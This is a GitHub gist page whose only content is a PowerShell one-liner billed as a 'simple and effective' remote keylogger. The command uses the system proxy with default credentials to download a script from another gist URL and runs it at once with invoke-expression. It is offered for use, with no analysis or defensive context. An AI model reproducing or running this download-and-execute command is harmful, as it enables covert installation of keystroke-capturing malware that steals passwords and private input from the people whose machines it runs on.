Skip to content

Instantly share code, notes, and snippets.

@AddaxSoft
Created February 25, 2021 12:09
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save AddaxSoft/35e095b9e62959a8ccdeb23f6db51bd1 to your computer and use it in GitHub Desktop.
Save AddaxSoft/35e095b9e62959a8ccdeb23f6db51bd1 to your computer and use it in GitHub Desktop.
simple and effective 1-liner remote keylogger using PowerShell
$url="https://gist.githubusercontent.com/dasgoll/7ca1c059dd3b3fbc7277/raw/e4e3a530589dac67ab6c4c2428ea90de93b86018/gistfile1.txt"; $p=[System.Net.WebRequest]::GetSystemWebProxy();$p.Credentials=[System.Net.CredentialCache]::DefaultCredentials; $c=new-object system.net.WebClient;$c.proxy=$p;$x=$c.downloadstring($url);invoke-expression $x;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment